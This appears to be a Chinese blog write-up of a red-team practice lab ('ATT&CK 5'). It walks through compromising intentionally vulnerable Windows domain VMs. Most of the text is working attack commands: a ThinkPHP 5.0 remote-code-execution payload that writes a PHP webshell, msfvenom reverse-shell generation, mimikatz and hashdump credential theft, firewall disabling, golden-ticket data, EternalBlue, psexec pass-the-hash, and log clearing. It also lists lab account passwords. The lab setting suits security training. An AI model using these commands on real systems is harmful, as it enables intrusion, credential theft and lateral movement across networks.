ATT&CK(五)
win7账号密码:
sun\heart 123.com
sun\Administrator dc123.com 密码我进去后改成123.comdc了
—————————————————————————————————————————————————————————————
2008账号密码
sun\admin 2020.com
登录win7 开启phpstudy
nmap 192.168.135.0/24
web
发现是 thinkphp v5.0
查一下这个的洞
searchsploit thinkphp 5.0
searchsploit -m php/webapps/45978.txt
cat 45978.txt
/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
写入shell
/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo+"<%3fphp+%40eval($_POST['zf'])%3b%3f>"+>+zf.php
这里扫目录还发现了一个马
爆破下
win7上线cs
./teamserver 192.168.135.130 wanan
信息收集
ipconfig /all
查看主机ip 所在域
定位域控
shell net time /domain
查询时间服务器域名 一般为域控
shell ping DC.sun.com
获取时间服务器ip
hashdump
读取hash
logonpasswords
net view
shell net view /domain
判断是否存在多个域
shell net user /domain
查看域下用户
shell net group "domain controllers" /domain
查看域控
读到了密码
sun\Administrator
123.comdc
关闭防火墙 开启远程桌面
shell netsh firewall set opmode disable
shell REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
psexec横向
黄金票据
krbtgt 的NTLM
wanan
SUN.COM
S-1-5-21-3388020223-1982701712-4030140183-500
65dc23a67f31503698981f2665f9d858
shell dir \\DC\C$
清除日志
win7上线msf
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.135.128 lport=4444 -f exe -o payload1.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.135.128
run
迁移一下进程
还有一张138的网卡
配置代理
设置路由
msf操作
route add 192.168.138.0 255.255.255.0 10
route print
sessions操作
run autoroute -s 192.168.138.0/24
run autoroute -p
use auxiliary/server/socks_proxy
options
set srvhost 0.0.0.0
edit /etc/proxychains4.conf
run
proxychains curl http://192.168.138.136
上线dc
use auxiliary/scanner/discovery/udp_probe
set rhosts 192.168.138.1-255
run
proxychains nmap 192.168.138.138
load kiwi
kiwi_cmd privilege::debug
kiwi_cmd sekurlsa::logonPasswords
这里抓到了靶机和域控的密码,那么这里就可以使用pth的方法进行横向移动,这是第一种方法,另外我们可以去检测一下在另一个网段的机器有什么漏洞可以利用,如ms17_010 cve-2020-0796等等 ,利用漏洞的exp进行横向移动,这是第二种方法,因为我们之前用nmap对端口进行扫描发现139和445端口的,那么我们拿到了密码的情况下,可以尝试使用ipc+计划任务的方式进行横向移动
ms17-010尝试
use windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
options
set rhost 192.168.138.138
run
这里可以很明显的看到,靶机存在永恒之蓝但是session 反弹不成功,这里是因为windows server2008的情况下匿名管道是默认不开启的, 我们知道psexec的原理就是使用了管道,ipc连接也是同理,那么在匿名管道不开的情况下永恒之蓝的连接是建立不上的
匿名管道的概念
管道是ipc最基本的一种实现机制,在linux下一切皆文件 其实这里的管道其实就是一个文件.管道实现进程通信就是让两个进程都能访问该文件
管道的特征
只能提供单向通信,也就是说进程都能访问这个文件,假设进程1往文件里写东西,那么进程2就只能读取文件的内容
只能用于具有血缘关系的进程间进行通信,通常用于父子进程间通信
管道是依赖于字节流来通信的
依赖于文件系统,它的声明周期随进程的结束结束(随进程)
其本身自带同步互斥效果
psexec尝试
因为我们已经拿到了域管的账号那么我们这里直接使用pth的方法,即哈希传递,使用的是psexec模块,不过这个模块因为被使用太多导致已经被杀软列入了黑名单,如果这里有杀软存在的情况下psexec横向移动是会被拦截的.
use exploit/windows/smb/psexec
options
set payload windows/x64/meterpreter/bind_tcp
set smbdomain sun
set smbuser
set smbuser Administrator
set smbpass 123.comdc
set rhosts 192.168.138.138
set lport 6666
run
这里发现没有成功 推测可能是 防火墙的原因
net use \\192.168.138.138\ipc$ 123.comdc /user:Administrator
net use
sc \\192.168.138.138 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\192.168.138.138 start unablefirewall
use exploit/windows/smb/psexec
options
set payload windows/x64/meterpreter/bind_tcp
set smbdomain sun
set smbuser
set smbuser Administrator
set smbpass 123.comdc
set rhosts 192.168.138.138
set lport 6666
run
https://cloud.tencent.com/developer/article/1601681
https://zhuanlan.zhihu.com/p/412714049
https://blog.csdn.net/feiniaotjx/article/details/122910775
https://blog.csdn.net/BuNahua/article/details/120098504
https://drunkmars.top/2021/07/06/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA5/#
http://www.4k8k.xyz/article/qq_45780190/124207193
https://www.wangan.com/articles/4145
https://jishuin.proginn.com/p/763bfbd7bdab
https://blog.csdn.net/qq_38626043/article/details/119141146
https://blog.csdn.net/qq_36241198/article/details/121668010
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
